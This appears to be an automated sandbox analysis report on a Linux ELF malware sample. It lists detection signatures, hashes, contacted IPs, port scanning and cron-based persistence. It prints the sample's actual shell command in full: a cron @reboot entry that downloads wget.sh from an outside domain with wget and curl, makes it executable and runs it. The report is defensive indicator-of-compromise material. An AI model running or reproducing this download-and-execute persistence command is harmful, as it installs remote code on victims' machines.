Linux Analysis Report
nshmpsl.elf

Overview

General Information

Sample name:	nshmpsl.elf
Analysis ID:	1542858
MD5:	2ebce2c623cee35100ce645095e0e17a
SHA1:	f8cf8d0db764834f60325110897e8a7cabc96fc4
SHA256:	b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Connects to many ports of the same IP (likely port scanning)

Executes the "crontab" command typically for achieving persistence

Sample tries to persist itself using cron

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Found strings indicative of a multi-platform dropper

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: nshmpsl.elf

ReversingLabs: Detection: 18%

Found strings indicative of a multi-platform dropper

Source: tmp.98hekB.18.dr

String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 193.233.193.45 ports 1,2,8,13400,9,12892
Source: global traffic	TCP traffic: 91.149.218.232 ports 5351,1,2,22281,8,13788
Source: global traffic	TCP traffic: 88.151.195.22 ports 12043,0,1,1414,2,3,4
Source: global traffic	TCP traffic: 81.29.149.178 ports 1,2,3,3159,8,13812
Source: global traffic	TCP traffic: 91.149.238.18 ports 21752,6271,1,2,5,7

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.14:51200 -> 88.151.195.22:12043
Source: global traffic	TCP traffic: 192.168.2.14:50032 -> 81.29.149.178:13812
Source: global traffic	TCP traffic: 192.168.2.14:38194 -> 86.107.100.80:22281
Source: global traffic	TCP traffic: 192.168.2.14:58396 -> 91.149.218.232:22281
Source: global traffic	TCP traffic: 192.168.2.14:52574 -> 91.149.238.18:21752
Source: global traffic	TCP traffic: 192.168.2.14:49020 -> 193.233.193.45:12892
Source: global traffic	TCP traffic: 192.168.2.14:41466 -> 51.89.127.38:25565
Source: global traffic	TCP traffic: 192.168.2.14:51162 -> 195.133.92.51:23231
Source: global traffic	TCP traffic: 192.168.2.14:42048 -> 194.87.198.29:5005
Source: global traffic	TCP traffic: 192.168.2.14:54070 -> 213.182.204.57:22105

Sample listens on a socket

Source: /tmp/nshmpsl.elf (PID: 5489)

Socket: 127.0.0.1:1172

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38
Source: unknown	TCP traffic detected without corresponding DNS query: 51.89.127.38

Source: global traffic

DNS traffic detected: DNS query: kingstonwikkerink.dyn

Source: tmp.98hekB.18.dr

String found in binary or memory: http://hailcocks.ru/wget.sh;

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Sample tries to kill a process (SIGKILL)

Source: /tmp/nshmpsl.elf (PID: 5618)

SIGKILL sent: pid: 5616, result: successful

Jump to behavior

Source: classification engine

Classification label: mal60.troj.linELF@0/1@25/0

Persistence and Installation Behavior

Executes the "crontab" command typically for achieving persistence

Source: /bin/sh (PID: 5495)	Crontab executable: /usr/bin/crontab -> crontab -l			Jump to behavior
Source: /bin/sh (PID: 5494)	Crontab executable: /usr/bin/crontab -> crontab -			Jump to behavior

Sample tries to persist itself using cron

Source: /usr/bin/crontab (PID: 5494)	File: /var/spool/cron/crontabs/tmp.98hekB			Jump to behavior
Source: /usr/bin/crontab (PID: 5494)	File: /var/spool/cron/crontabs/root			Jump to behavior

Executes commands using a shell command-line interpreter

Source: /tmp/nshmpsl.elf (PID: 5491)

Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

Jump to behavior

Source: submitted sample

Stderr: no crontab for root: exit code = 0

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/nshmpsl.elf (PID: 5489)

Queries kernel information via 'uname':

Jump to behavior

Source: nshmpsl.elf, 5489.1.000056381ffc4000.000056382008e000.rw-.sdmp, nshmpsl.elf, 5496.1.000056381ffc4000.000056382008e000.rw-.sdmp, nshmpsl.elf, 5616.1.000056381ffc4000.000056382008e000.rw-.sdmp, nshmpsl.elf, 5618.1.000056381ffc4000.000056382008e000.rw-.sdmp	Binary or memory string: 8V!/etc/qemu-binfmt/mipsel
Source: nshmpsl.elf, 5489.1.00007ffc1b9cb000.00007ffc1b9ec000.rw-.sdmp, nshmpsl.elf, 5496.1.00007ffc1b9cb000.00007ffc1b9ec000.rw-.sdmp, nshmpsl.elf, 5616.1.00007ffc1b9cb000.00007ffc1b9ec000.rw-.sdmp, nshmpsl.elf, 5618.1.00007ffc1b9cb000.00007ffc1b9ec000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/nshmpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshmpsl.elf
Source: nshmpsl.elf, 5489.1.000056381ffc4000.000056382008e000.rw-.sdmp, nshmpsl.elf, 5496.1.000056381ffc4000.000056382008e000.rw-.sdmp, nshmpsl.elf, 5616.1.000056381ffc4000.000056382008e000.rw-.sdmp, nshmpsl.elf, 5618.1.000056381ffc4000.000056382008e000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: nshmpsl.elf, 5489.1.00007ffc1b9cb000.00007ffc1b9ec000.rw-.sdmp, nshmpsl.elf, 5496.1.00007ffc1b9cb000.00007ffc1b9ec000.rw-.sdmp, nshmpsl.elf, 5616.1.00007ffc1b9cb000.00007ffc1b9ec000.rw-.sdmp, nshmpsl.elf, 5618.1.00007ffc1b9cb000.00007ffc1b9ec000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
213.182.204.57	unknown	Latvia	9009	M247GB	false
51.89.127.38	unknown	France	16276	OVHFR	false
194.87.198.29	unknown	Russian Federation	49352	LOGOL-ASRU	false
193.233.193.45	kingstonwikkerink.dyn	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
195.133.92.51	unknown	Russian Federation	197695	AS-REGRU	false
91.149.218.232	unknown	Poland	198401	GECKONET-ASPL	true
86.107.100.80	unknown	Romania	38995	AMG-ASRO	false
88.151.195.22	unknown	Azerbaijan	15723	AZERONLINEAZ	true
81.29.149.178	unknown	Switzerland	39616	COMUNICA_IT_SERVICESCH	true
91.149.238.18	unknown	Poland	41952	MARTON-ASPL	true

Contacted Domains

Name	IP	Active
kingstonwikkerink.dyn	193.233.193.45	true

ID:	1542858
Product:	CloudBasic
Start time:	19:16:21
Start date:	26.10.2024
Sample:	nshmpsl.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	2ebce2c623cee35100ce645095e0e17a
SHA1:	f8cf8d0db764834f60325110897e8a7cabc96fc4
SHA256:	b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840
Filetype:	ELF Executable and Linkable format (generic) (4004/1) 100.00%

Linux Analysis Report
nshmpsl.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Linux Analysis Report nshmpsl.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Linux Analysis Report
nshmpsl.elf